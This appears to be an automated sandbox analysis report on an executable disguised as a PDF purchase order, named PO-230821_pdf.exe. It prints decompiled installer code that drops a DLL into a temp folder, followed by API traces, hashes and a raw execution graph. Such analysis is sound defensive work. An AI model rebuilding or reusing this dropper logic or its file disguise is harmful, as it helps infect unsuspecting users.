                                            				 *(_t35 - 0x10) = _t14;
                                            				_t27 = 0 | _t40 == 0x00000000;
                                            				_t32 = _t40 == 0;
                                            				if(_t14 == __ebx) {
                                            					if(__edx != 0x38) {
                                            						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                            					} else {
                                            						E00402DA6(0x21);
                                            						E0040668A("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp", "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll", 0x400);
                                            						_t17 = lstrlenA("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll");
                                            					}
                                            				} else {
                                            					E00402D84(1);
                                            					 *0x40adf8 = __ax;
                                            					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                            				}
                                            				 *(_t35 + 8) = _t17;
                                            				if( *_t29 == _t24) {
                                            					L13:
                                            					 *((intOrPtr*)(_t35 - 4)) = 1;
                                            				} else {
                                            					_t31 = E004065C8(_t27, _t29);
                                            					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
                                            						_t14 = E0040620A(_t31, "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll",  *(_t35 + 8));
                                            						_t42 = _t14;
                                            						if(_t42 == 0) {
                                            							goto L13;
                                            						}
                                            					} else {
                                            						goto L13;
                                            					}
                                            				}
                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                            				return 0;
                                            			}












                                            0x0040263e
                                            0x0040263e
                                            0x0040263e
                                            0x00402643
                                            0x00402646
                                            0x00402649
                                            0x0040264e
                                            0x00402650
                                            0x00402670
                                            0x004026aa
                                            0x00402672
                                            0x00402674
                                            0x00402688
                                            0x00402695
                                            0x00402695
                                            0x00402652
                                            0x00402654
                                            0x00402659
                                            0x00402667
                                            0x0040266a
                                            0x004026af
                                            0x004026b2
                                            0x0040292e
                                            0x0040292e
                                            0x004026b8
                                            0x004026c1
                                            0x004026c3
                                            0x004026e2
                                            0x004015b4
                                            0x004015b6
                                            0x00000000
                                            0x004015bc
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004026c3
                                            0x00402c2d
                                            0x00402c39

                                            APIs
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll), ref: 00402695
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll
                                            • API String ID: 1659193697-3326437127
                                            • Opcode ID: 4a9067d827a4b8c099a0c03f7ab0fb9ba25826a25fc5163b758c2c2faf7004e8
                                            • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                            • Opcode Fuzzy Hash: 4a9067d827a4b8c099a0c03f7ab0fb9ba25826a25fc5163b758c2c2faf7004e8
                                            • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00403C25() {
                                            				void* _t1;
                                            				void* _t2;
                                            				signed int _t11;
                                            
                                            				_t1 =  *0x40a018; // 0x2dc
                                            				if(_t1 != 0xffffffff) {
                                            					CloseHandle(_t1);
                                            					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                            				}
                                            				_t2 =  *0x40a01c; // 0x2f0
                                            				if(_t2 != 0xffffffff) {
                                            					CloseHandle(_t2);
                                            					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                            					_t11 =  *0x40a01c;
                                            				}
                                            				E00403C82();
                                            				return E00405D74(_t11, L"C:\\Users\\Alvin\\AppData\\Local\\Temp\\nsv6B4F.tmp", 7);
                                            			}






                                            0x00403c25
                                            0x00403c34
                                            0x00403c37
                                            0x00403c39
                                            0x00403c39
                                            0x00403c40
                                            0x00403c48
                                            0x00403c4b
                                            0x00403c4d
                                            0x00403c4d
                                            0x00403c4d
                                            0x00403c54
                                            0x00403c66

                                            APIs
                                            • CloseHandle.KERNEL32(000002DC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                            • CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                            • C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp, xrefs: 00403C5B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp
                                            • API String ID: 2962429428-4266610100
                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                            				int _t15;
                                            				long _t16;
                                            
                                            				_t15 = _a8;
                                            				if(_t15 != 0x102) {
                                            					if(_t15 != 0x200) {
                                            						_t16 = _a16;
                                            						L7:
                                            						if(_t15 == 0x419 &&  *0x423734 != _t16) {
                                            							_push(_t16);
                                            							_push(6);
                                            							 *0x423734 = _t16;
                                            							E00404FFF();
                                            						}
                                            						L11:
                                            						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
                                            					}
                                            					if(IsWindowVisible(_a4) == 0) {
                                            						L10:
                                            						_t16 = _a16;
                                            						goto L11;
                                            					}
                                            					_t16 = E00404F7F(_a4, 1);
                                            					_t15 = 0x419;
                                            					goto L7;
                                            				}
                                            				if(_a12 != 0x20) {
                                            					goto L10;
                                            				}
                                            				E00404610(0x413);
                                            				return 0;
                                            			}





                                            0x00405642
                                            0x0040564c
                                            0x00405668
                                            0x0040568a
                                            0x0040568d
                                            0x00405693
                                            0x0040569d
                                            0x0040569e
                                            0x004056a0
                                            0x004056a6
                                            0x004056a6
                                            0x004056b0
                                            0x00000000
                                            0x004056be
                                            0x00405675
                                            0x004056ad
                                            0x004056ad
                                            0x00000000
                                            0x004056ad
                                            0x00405681
                                            0x00405683
                                            0x00000000
                                            0x00405683
                                            0x00405652
                                            0x00000000
                                            0x00000000
                                            0x00405659
                                            0x00000000

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0040566D
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E00405F83(WCHAR* _a4) {
                                            				WCHAR* _t5;
                                            				WCHAR* _t7;
                                            
                                            				_t7 = _a4;
                                            				_t5 =  &(_t7[lstrlenW(_t7)]);
                                            				while( *_t5 != 0x5c) {
                                            					_push(_t5);
                                            					_push(_t7);
                                            					_t5 = CharPrevW();
                                            					if(_t5 > _t7) {
                                            						continue;
                                            					}
                                            					break;
                                            				}
                                            				 *_t5 =  *_t5 & 0x00000000;
                                            				return  &(_t5[1]);
                                            			}





                                            0x00405f84
                                            0x00405f8e
                                            0x00405f91
                                            0x00405f97
                                            0x00405f98
                                            0x00405f99
                                            0x00405fa1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405fa1
                                            0x00405fa3
                                            0x00405fab

                                            APIs
                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-230821_pdf.exe,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 00405F89
                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-230821_pdf.exe,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 00405F99
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-2110743547
                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                            				int _v8;
                                            				int _t12;
                                            				int _t14;
                                            				int _t15;
                                            				CHAR* _t17;
                                            				CHAR* _t27;
                                            
                                            				_t12 = lstrlenA(_a8);
                                            				_t27 = _a4;
                                            				_v8 = _t12;
                                            				while(lstrlenA(_t27) >= _v8) {
                                            					_t14 = _v8;
                                            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                            					_t15 = lstrcmpiA(_t27, _a8);
                                            					_t27[_v8] =  *(_t14 + _t27);
                                            					if(_t15 == 0) {
                                            						_t17 = _t27;
                                            					} else {
                                            						_t27 = CharNextA(_t27);
                                            						continue;
                                            					}
                                            					L5:
                                            					return _t17;
                                            				}
                                            				_t17 = 0;
                                            				goto L5;
                                            			}









                                            0x004060cd
                                            0x004060cf
                                            0x004060d2
                                            0x004060fe
                                            0x004060d7
                                            0x004060e0
                                            0x004060e5
                                            0x004060f0
                                            0x004060f3
                                            0x0040610f
                                            0x004060f5
                                            0x004060fc
                                            0x00000000
                                            0x004060fc
                                            0x00406108
                                            0x0040610c
                                            0x0040610c
                                            0x00406106
                                            0x00000000

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:4.8%
                                            Dynamic/Decrypted Code Coverage:8.6%
                                            Signature Coverage:6.6%
                                            Total number of Nodes:590
                                            Total number of Limit Nodes:75
                                            execution_graph 28916 41f080 28919 41b960 28916->28919 28920 41b986 28919->28920 28927 409d30 28920->28927 28922 41b992 28923 41b9b3 28922->28923 28935 40c1b0 28922->28935 28925 41b9a5 28971 41a6a0 28925->28971 28974 409c80 28927->28974 28929 409d3d 28930 409d44 28929->28930 28986 409c20 28929->28986 28930->28922 28936 40c1d5 28935->28936 29405 40b1b0 28936->29405 28938 40c22c 29409 40ae30 28938->29409 28940 40c4a3 28940->28925 28941 40c252 28941->28940 29418 414390 28941->29418 28943 40c297 28943->28940 29421 408a60 28943->29421 28945 40c2db 28945->28940 29428 41a4f0 28945->29428 28949 40c331 28950 40c338 28949->28950 29440 41a000 28949->29440 28951 41bdb0 2 API calls 28950->28951 28953 40c345 28951->28953 28953->28925 28955 40c382 28956 41bdb0 2 API calls 28955->28956 28957 40c389 28956->28957 28957->28925 28958 40c392 28959 40f490 3 API calls 28958->28959 28960 40c406 28959->28960 28960->28950 28961 40c411 28960->28961 28962 41bdb0 2 API calls 28961->28962 28963 40c435 28962->28963 29445 41a050 28963->29445 28966 41a000 2 API calls 28967 40c470 28966->28967 28967->28940 29450 419e10 28967->29450 28970 41a6a0 2 API calls 28970->28940 28972 41af50 LdrLoadDll 28971->28972 28973 41a6bf ExitProcess 28972->28973 28973->28923 28975 409c93 28974->28975 29025 418bb0 LdrLoadDll 28974->29025 29005 418a60 28975->29005 28978 409ca6 28978->28929 28979 409c9c 28979->28978 29008 41b2a0 28979->29008 28981 409ce3 28981->28978 29019 409aa0 28981->29019 28983 409d03 29026 409620 LdrLoadDll 28983->29026 28985 409d15 28985->28929 28987 409c3a 28986->28987 28988 41b590 LdrLoadDll 28986->28988 29380 41b590 28987->29380 28988->28987 28991 41b590 LdrLoadDll 28992 409c61 28991->28992 28993 40f170 28992->28993 28994 40f189 28993->28994 29388 40b030 28994->29388 28996 40f19c 29392 41a1d0 28996->29392 28999 409d55 28999->28922 29001 40f1c2 29002 40f1ed 29001->29002 29398 41a250 29001->29398 29003 41a480 2 API calls 29002->29003 29003->28999 29027 41a5f0 29005->29027 29009 41b2b9 29008->29009 29040 414a40 29009->29040 29011 41b2d1 29012 41b2da 29011->29012 29079 41b0e0 29011->29079 29012->28981 29014 41b2ee 29014->29012 29097 419ef0 29014->29097 29357 407ea0 29019->29357 29021 409aba 29022 409ac1 29021->29022 29370 408160 29021->29370 29022->28983 29025->28975 29026->28985 29030 41af50 29027->29030 29029 418a75 29029->28979 29031 41af60 29030->29031 29033 41af82 29030->29033 29034 414e40 29031->29034 29033->29029 29035 414e5a 29034->29035 29036 414e4e 29034->29036 29035->29033 29036->29035 29039 4152c0 LdrLoadDll 29036->29039 29038 414fac 29038->29033 29039->29038 29041 414d75 29040->29041 29042 414a54 29040->29042 29041->29011 29042->29041 29105 419c40 29042->29105 29045 414b80 29109 41a350 29045->29109 29046 414b63 29167 41a450 LdrLoadDll 29046->29167 29049 414b6d 29049->29011 29050 414ba7 29051 41bdb0 2 API calls 29050->29051 29054 414bb3 29051->29054 29052 414d39 29053 41a480 2 API calls 29052->29053 29056 414d40 29053->29056 29054->29049 29054->29052 29055 414d4f 29054->29055 29059 414c42 29054->29059 29176 414780 LdrLoadDll NtReadFile NtClose 29055->29176 29056->29011 29058 414d62 29058->29011 29060 414ca9 29059->29060 29062 414c51 29059->29062 29060->29052 29061 414cbc 29060->29061 29169 41a2d0 29061->29169 29064 414c56 29062->29064 29065 414c6a 29062->29065 29168 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 29064->29168 29068 414c87 29065->29068 29069 414c6f 29065->29069 29068->29056 29125 414400 29068->29125 29113 4146e0 29069->29113 29072 414c60 29072->29011 29073 414c7d 29073->29011 29075 414d1c 29173 41a480 29075->29173 29076 414c9f 29076->29011 29078 414d28 29078->29011 29081 41b0f1 29079->29081 29080 41b103 29080->29014 29081->29080 29194 41bd30 29081->29194 29083 41b124 29197 414060 29083->29197 29085 41b170 29085->29014 29086 41b147 29086->29085 29087 414060 3 API calls 29086->29087 29089 41b169 29087->29089 29089->29085 29229 415380 29089->29229 29090 41b1fa 29092 41b20a 29090->29092 29323 41aef0 LdrLoadDll 29090->29323 29239 41ad60 29092->29239 29094 41b238 29318 419eb0 29094->29318 29098 41af50 LdrLoadDll 29097->29098 29099 419f0c 29098->29099 29351 a62afa 29099->29351 29100 419f27 29102 41bdb0 29100->29102 29354 41a660 29102->29354 29104 41b349 29104->28981 29106 419c4c 29105->29106 29107 41af50 LdrLoadDll 29106->29107 29108 414b34 29107->29108 29108->29045 29108->29046 29108->29049 29110 41af50 LdrLoadDll 29109->29110 29111 41a36c NtCreateFile 29110->29111 29111->29050 29114 4146fc 29113->29114 29115 41a2d0 LdrLoadDll 29114->29115 29116 41471d 29115->29116 29117 414724 29116->29117 29118 414738 29116->29118 29119 41a480 2 API calls 29117->29119 29120 41a480 2 API calls 29118->29120 29121 41472d 29119->29121 29122 414741 29120->29122 29121->29073 29177 41bfc0 LdrLoadDll RtlAllocateHeap 29122->29177 29124 41474c 29124->29073 29126 41444b 29125->29126 29127 41447e 29125->29127 29129 41a2d0 LdrLoadDll 29126->29129 29128 4145c9 29127->29128 29133 41449a 29127->29133 29130 41a2d0 LdrLoadDll 29128->29130 29131 414466 29129->29131 29137 4145e4 29130->29137 29132 41a480 2 API calls 29131->29132 29134 41446f 29132->29134 29135 41a2d0 LdrLoadDll 29133->29135 29134->29076 29136 4144b5 29135->29136 29139 4144d1 29136->29139 29140 4144bc 29136->29140 29190 41a310 LdrLoadDll 29137->29190 29143 4144d6 29139->29143 29144 4144ec 29139->29144 29142 41a480 2 API calls 29140->29142 29141 41461e 29145 41a480 2 API calls 29141->29145 29146 4144c5 29142->29146 29147 41a480 2 API calls 29143->29147 29152 4144f1 29144->29152 29178 41bf80 29144->29178 29148 414629 29145->29148 29146->29076 29149 4144df 29147->29149 29148->29076 29149->29076 29160 414503 29152->29160 29181 41a400 29152->29181 29153 414557 29154 41456e 29153->29154 29189 41a290 LdrLoadDll 29153->29189 29155 414575 29154->29155 29156 41458a 29154->29156 29158 41a480 2 API calls 29155->29158 29159 41a480 2 API calls 29156->29159 29158->29160 29161 414593 29159->29161 29160->29076 29162 4145bf 29161->29162 29184 41bb80 29161->29184 29162->29076 29164 4145aa 29165 41bdb0 2 API calls 29164->29165 29166 4145b3 29165->29166 29166->29076 29167->29049 29168->29072 29170 414d04 29169->29170 29171 41af50 LdrLoadDll 29169->29171 29172 41a310 LdrLoadDll 29170->29172 29171->29170 29172->29075 29174 41a49c NtClose 29173->29174 29175 41af50 LdrLoadDll 29173->29175 29174->29078 29175->29174 29176->29058 29177->29124 29180 41bf98 29178->29180 29191 41a620 29178->29191 29180->29152 29182 41a41c NtReadFile 29181->29182 29183 41af50 LdrLoadDll 29181->29183 29182->29153 29183->29182 29185 41bba4 29184->29185 29186 41bb8d 29184->29186 29185->29164 29186->29185 29187 41bf80 2 API calls 29186->29187 29188 41bbbb 29187->29188 29188->29164 29189->29154 29190->29141 29192 41af50 LdrLoadDll 29191->29192 29193 41a63c RtlAllocateHeap 29192->29193 29193->29180 29195 41bd5d 29194->29195 29324 41a530 29194->29324 29195->29083 29198 414071 29197->29198 29199 414079 29197->29199 29198->29086 29228 41434c 29199->29228 29327 41cf20 29199->29327 29201 4140cd 29202 41cf20 2 API calls 29201->29202 29206 4140d8 29202->29206 29203 414126 29205 41cf20 2 API calls 29203->29205 29209 41413a 29205->29209 29206->29203 29207 41d050 3 API calls 29206->29207 29338 41cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 29206->29338 29207->29206 29208 414197 29210 41cf20 2 API calls 29208->29210 29209->29208 29332 41d050 29209->29332 29211 4141ad 29210->29211 29213 4141ea 29211->29213 29215 41d050 3 API calls 29211->29215 29214 41cf20 2 API calls 29213->29214 29216 4141f5 29214->29216 29215->29211 29217 41422f 29216->29217 29218 41d050 3 API calls 29216->29218 29339 41cf80 LdrLoadDll RtlFreeHeap 29217->29339 29218->29216 29220 414324 29340 41cf80 LdrLoadDll RtlFreeHeap 29220->29340 29222 41432e 29341 41cf80 LdrLoadDll RtlFreeHeap 29222->29341 29224 414338 29342 41cf80 LdrLoadDll RtlFreeHeap 29224->29342 29226 414342 29343 41cf80 LdrLoadDll RtlFreeHeap 29226->29343 29228->29086 29230 415391 29229->29230 29231 414a40 8 API calls 29230->29231 29233 4153a7 29231->29233 29232 4153fa 29232->29090 29233->29232 29234 4153e2 29233->29234 29235 4153f5 29233->29235 29237 41bdb0 2 API calls 29234->29237 29236 41bdb0 2 API calls 29235->29236 29236->29232 29238 4153e7 29237->29238 29238->29090 29344 41ac20 29239->29344 29242 41ac20 LdrLoadDll 29243 41ad7d 29242->29243 29244 41ac20 LdrLoadDll 29243->29244 29245 41ad86 29244->29245 29246 41ac20 LdrLoadDll 29245->29246 29247 41ad8f 29246->29247 29248 41ac20 LdrLoadDll 29247->29248 29249 41ad98 29248->29249 29250 41ac20 LdrLoadDll 29249->29250 29251 41ada1 29250->29251 29252 41ac20 LdrLoadDll 29251->29252 29253 41adad 29252->29253 29254 41ac20 LdrLoadDll 29253->29254 29255 41adb6 29254->29255 29256 41ac20 LdrLoadDll 29255->29256 29257 41adbf 29256->29257 29258 41ac20 LdrLoadDll 29257->29258 29259 41adc8 29258->29259 29260 41ac20 LdrLoadDll 29259->29260 29261 41add1 29260->29261 29262 41ac20 LdrLoadDll 29261->29262 29263 41adda 29262->29263 29264 41ac20 LdrLoadDll 29263->29264 29265 41ade6 29264->29265 29266 41ac20 LdrLoadDll 29265->29266 29267 41adef 29266->29267 29268 41ac20 LdrLoadDll 29267->29268 29269 41adf8 29268->29269 29270 41ac20 LdrLoadDll 29269->29270 29271 41ae01 29270->29271 29272 41ac20 LdrLoadDll 29271->29272 29273 41ae0a 29272->29273 29274 41ac20 LdrLoadDll 29273->29274 29275 41ae13 29274->29275 29276 41ac20 LdrLoadDll 29275->29276 29277 41ae1f 29276->29277 29278 41ac20 LdrLoadDll 29277->29278 29279 41ae28 29278->29279 29280 41ac20 LdrLoadDll 29279->29280 29281 41ae31 29280->29281 29282 41ac20 LdrLoadDll 29281->29282 29283 41ae3a 29282->29283 29284 41ac20 LdrLoadDll 29283->29284 29285 41ae43 29284->29285 29286 41ac20 LdrLoadDll 29285->29286 29287 41ae4c 29286->29287 29288 41ac20 LdrLoadDll 29287->29288 29289 41ae58 29288->29289 29290 41ac20 LdrLoadDll 29289->29290 29291 41ae61 29290->29291 29292 41ac20 LdrLoadDll 29291->29292 29293 41ae6a 29292->29293 29294 41ac20 LdrLoadDll 29293->29294 29295 41ae73 29294->29295 29296 41ac20 LdrLoadDll 29295->29296 29297 41ae7c 29296->29297 29298 41ac20 LdrLoadDll 29297->29298 29299 41ae85 29298->29299 29300 41ac20 LdrLoadDll 29299->29300 29301 41ae91 29300->29301 29302 41ac20 LdrLoadDll 29301->29302 29303 41ae9a 29302->29303 29304 41ac20 LdrLoadDll 29303->29304 29305 41aea3 29304->29305 29306 41ac20 LdrLoadDll 29305->29306 29307 41aeac 29306->29307 29308 41ac20 LdrLoadDll 29307->29308 29309 41aeb5 29308->29309 29310 41ac20 LdrLoadDll 29309->29310 29311 41aebe 29310->29311 29312 41ac20 LdrLoadDll 29311->29312 29313 41aeca 29312->29313 29314 41ac20 LdrLoadDll 29313->29314 29315 41aed3 29314->29315 29316 41ac20 LdrLoadDll 29315->29316 29317 41aedc 29316->29317 29317->29094 29319 41af50 LdrLoadDll 29318->29319 29320 419ecc 29319->29320 29350 a62ce0 LdrInitializeThunk 29320->29350 29321 419ee3 29321->29014 29323->29092 29325 41a54c NtAllocateVirtualMemory 29324->29325 29326 41af50 LdrLoadDll 29324->29326 29325->29195 29326->29325 29328 41cf30 29327->29328 29329 41cf36 29327->29329 29328->29201 29330 41bf80 2 API calls 29329->29330 29331 41cf5c 29330->29331 29331->29201 29333 41cfc0 29332->29333 29334 41d01d 29333->29334 29335 41bf80 2 API calls 29333->29335 29334->29209 29336 41cffa 29335->29336 29337 41bdb0 2 API calls 29336->29337 29337->29334 29338->29206 29339->29220 29340->29222 29341->29224 29342->29226 29343->29228 29345 41ac3b 29344->29345 29346 414e40 LdrLoadDll 29345->29346 29347 41ac5b 29346->29347 29348 414e40 LdrLoadDll 29347->29348 29349 41ad07 29347->29349 29348->29349 29349->29242 29350->29321 29352 a62b01 29351->29352 29353 a62b0f LdrInitializeThunk 29351->29353 29352->29100 29353->29100 29355 41af50 LdrLoadDll 29354->29355 29356 41a67c RtlFreeHeap 29355->29356 29356->29104 29358 407eb0 29357->29358 29359 407eab 29357->29359 29360 41bd30 2 API calls 29358->29360 29359->29021 29363 407ed5 29360->29363 29361 407f38 29361->29021 29362 419eb0 2 API calls 29362->29363 29363->29361 29363->29362 29364 407f3e 29363->29364 29368 41bd30 2 API calls 